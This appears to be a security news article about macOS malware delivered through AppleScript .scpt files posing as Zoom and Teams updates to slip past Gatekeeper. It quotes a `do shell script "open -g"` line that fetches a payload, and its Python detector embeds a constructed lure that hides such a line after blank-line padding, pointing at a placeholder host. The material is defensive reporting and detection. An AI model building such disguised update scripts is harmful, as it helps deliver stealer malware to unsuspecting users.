Hackers are increasingly weaponizing AppleScript files to deliver macOS malware, masquerading as legitimate software updates for popular applications like Zoom and Microsoft Teams. This sophisticated new tactic emerged following Apple’s August 2024 patch that removed the “right-click and open” Gatekeeper override, forcing attackers to find alternative methods to bypass macOS security controls.
Security researchers have identified these malicious .scpt files, which by default open in the Script Editor application, presenting a deceptive user interface. Attackers exploit this by embedding malicious code after numerous blank lines, obscuring the true payload from casual inspection. Users who are tricked into clicking “Run” or pressing Cmd+R inadvertently execute the script, even if it has been flagged by Gatekeeper’s quarantine protections, effectively circumventing Apple’s built-in security measures.
AppleScript Weaponized for macOS Malware Delivery
This emerging threat vector, detailed by security analysts at Moonlock Labs and Pepe Berba, marks a significant evolution in macOS attack methodologies. While AppleScript files have been used in previous attacks, the recent proliferation of this particular technique, especially by common malware families like MacSync Stealer and Odyssey Stealer, is a cause for concern. This trend indicates a classic pattern where advanced techniques, once employed by sophisticated state-sponsored actors, are now trickling down to broader criminal operations targeting a wider user base.
The deception employed by these threat actors is multi-layered. Firstly, the filenames are crafted to mimic legitimate software updates. Examples include “MSTeamsUpdate.scpt,” “Zoom SDK Update.scpt,” and “Microsoft.TeamsSDK.scpt.” When opened, the Script Editor presents a seemingly innocuous interface with social engineering prompts designed to encourage the user to execute the script. The actual malicious code is hidden, making it difficult for the average user to detect.
Additionally, the underlying AppleScript code is designed to execute commands that appear mundane or relevant to software updates. A technical analysis revealed code snippets that, when executed, use the `do shell script` command to open malicious URLs in the background. For instance, a command might look like `do shell script "open -g " & quoted form of teamsSDKURL`, where `teamsSDKURL` points to a malicious web address. This allows attackers to download and install further payloads stealthily while the user is presented with a fake update process.
The effectiveness of this technique is further amplified by its ability to evade current security measures. Many of these .scpt files currently show zero detections on VirusTotal, providing attackers with a significant window of opportunity before security vendors can develop and deploy detection signatures. This lack of immediate detection allows the malware to spread more widely and establish persistence on victim systems.
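As an added illustration (not code from the article or from the researchers it cites), the following Python applies the indicators described above, long runs of blank lines hiding the payload, a `do shell script "open -g ..."` call, and an update-themed filename, to AppleScript source text. It assumes the source has already been recovered as text (on macOS, `osadecompile` on a compiled .scpt), and both sample scripts and the hostname in them are constructed.

```python
import re

# Constructed sample resembling the lure described in the article: a
# friendly comment visible at the top of Script Editor, hundreds of blank
# lines, then the hidden payload. The URL is a placeholder, not a real IoC.
SAMPLE_LURE = (
    "-- Microsoft Teams SDK update: press Run (Cmd+R) to continue\n"
    + "\n" * 300
    + 'set teamsSDKURL to "http://update.example.invalid/sdk.pkg"\n'
    + 'do shell script "open -g " & quoted form of teamsSDKURL\n'
)

# Constructed benign script for comparison.
SAMPLE_BENIGN = 'tell application "Finder"\n    display dialog "Hello"\nend tell\n'

# Filenames built from the vendor names and "update"/"SDK" words seen in the lures.
LURE_NAME = re.compile(r"(teams|zoom|microsoft).*(update|sdk)", re.IGNORECASE)


def longest_blank_run(source):
    """Longest run of consecutive blank lines (the padding trick)."""
    longest = current = 0
    for line in source.splitlines():
        current = current + 1 if not line.strip() else 0
        longest = max(longest, current)
    return longest


def analyze_applescript(source, filename="", blank_threshold=50):
    """Return padding length, a list of findings, and an overall verdict."""
    findings = []
    padding = longest_blank_run(source)
    if padding >= blank_threshold:
        findings.append(f"{padding} consecutive blank lines hide later code")
    lowered = source.lower()
    if "do shell script" in lowered:
        findings.append("do shell script present")
    # open -g opens the URL/file without bringing any app to the foreground
    if re.search(r'do shell script\s+"open\s+-g', lowered):
        findings.append("background 'open -g' via do shell script")
    if filename.lower().endswith(".scpt") and LURE_NAME.search(filename):
        findings.append(f"filename mimics a vendor update: {filename}")
    suspicious = padding >= blank_threshold and "do shell script" in lowered
    suspicious = suspicious or any("open -g" in f for f in findings)
    return {"padding": padding, "findings": findings, "suspicious": suspicious}


if __name__ == "__main__":
    print(analyze_applescript(SAMPLE_LURE, "MSTeamsUpdate.scpt"))
    print(analyze_applescript(SAMPLE_BENIGN, "hello.scpt"))
```

The blank-line threshold is a tunable heuristic; legitimate scripts rarely carry more than a handful of consecutive empty lines, so a high value keeps false positives low while still catching the padding described here.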
Circumventing Gatekeeper and User Trust
The primary method of distribution for these malicious AppleScript files is through phishing emails and compromised websites that offer seemingly legitimate software updates. Attackers prey on users who are actively seeking to update their applications, making them more susceptible to clicking on malicious links or downloading compromised files. This attack vector exploits user trust in familiar application names and the inherent reliance on native system tools that legitimate users interact with daily.
The bypassing of Gatekeeper is a critical aspect of this attack. Traditionally, Gatekeeper prevented users from opening downloaded applications from unidentified developers. However, by using compiled AppleScript files that can be executed directly, attackers are sidestepping these checks. The user’s action of clicking “Run” within the Script Editor effectively overrides the quarantine flag, allowing the malicious script to execute its payload.
Looking ahead, organizations must focus on educating their users about the importance of verifying software updates through official channels only. Furthermore, implementing robust endpoint detection and response (EDR) solutions capable of monitoring AppleScript execution patterns and command-line activity will be crucial. The evolving nature of these attacks suggests that continuous vigilance and adaptation of security strategies will be paramount in protecting macOS environments from sophisticated malware delivery techniques.